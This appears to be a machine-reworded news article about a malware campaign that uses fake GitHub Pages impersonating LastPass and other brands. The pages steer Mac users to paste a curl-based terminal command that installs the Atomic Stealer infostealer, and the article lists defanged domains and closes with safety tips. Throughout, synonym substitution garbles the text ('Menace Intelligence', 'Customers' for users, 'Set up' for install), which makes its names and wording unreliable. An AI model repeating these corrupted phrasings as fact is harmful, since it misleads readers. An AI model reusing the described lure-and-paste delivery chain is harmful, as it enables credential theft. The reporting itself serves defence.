- Atomic Stealer malware installs silently through pretend GitHub Pages concentrating on Mac customers
- Attackers create a number of GitHub accounts to bypass platform takedowns repeatedly
- Customers copying instructions from unverified web sites threat severe system compromise
Cybersecurity researchers are warning Apple Mac customers a couple of marketing campaign utilizing fraudulent GitHub repositories to unfold malware and infostealers.
Analysis from LastPass Menace Intelligence, Mitigation, and Escalation (TIME) analysts discovered attackers are impersonating well-known corporations to persuade folks to obtain pretend Mac software program.
Two fraudulent GitHub pages pretending to supply LastPass for Mac had been first noticed on September 16 2025 underneath the username “modhopmduck476.”
How the assault chain works
Whereas these specific pages have been taken down, the incident suggests a broader sample that continues to evolve.
The pretend GitHub pages included hyperlinks labeled “Set up LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.
From there, customers had been despatched to macprograms-pro[.]com/mac-git-2-download.html and advised to stick a command into their Mac’s terminal.
That command used a CURL request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/set up.sh.
The script then delivered an “Replace” payload that put in Atomic Stealer (AMOS malware) into the Temp listing.
Atomic Stealer, which has been lively since April 2023, is a identified infostealer utilized by financially motivated cybercrime teams.
Investigators have linked this marketing campaign to many different pretend repositories impersonating corporations starting from monetary establishments to productiveness apps.
The listing of focused names contains 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and quite a few others.
Attackers seem to create a number of GitHub usernames to bypass takedowns, utilizing Search Engine Optimization to push their malicious hyperlinks larger on search ends in Google and Bing.
This method will increase the possibilities that Mac customers looking for respectable downloads will encounter the fraudulent pages first.
LastPass states it’s “actively monitoring this marketing campaign” whereas engaged on takedowns and sharing indicators of compromise to assist others detect threats.
The attackers’ use of GitHub Pages reveals each the comfort and the dangers of neighborhood platforms.
Fraudulent repositories may be arrange shortly, and whereas GitHub can take away them, attackers typically return underneath new aliases.
This cycle raises questions on how successfully such platforms can defend customers.
Find out how to keep secure
- Solely obtain software program from verified sources to keep away from malware and ransomware dangers.
- Keep away from copying instructions from unfamiliar web sites to stop unauthorized code execution.
- Preserve macOS and all put in software program updated to cut back vulnerabilities.
- Use the finest antivirus or safety software program that features ransomware safety to dam threats.
- Allow common system backups to get well recordsdata if ransomware or malware strikes.
- Keep skeptical of sudden hyperlinks, emails, and pop-ups to reduce publicity.
- Monitor official advisories from trusted distributors for well timed safety updates and steerage.
- Configure sturdy, distinctive passwords and allow two-factor authentication for necessary accounts.
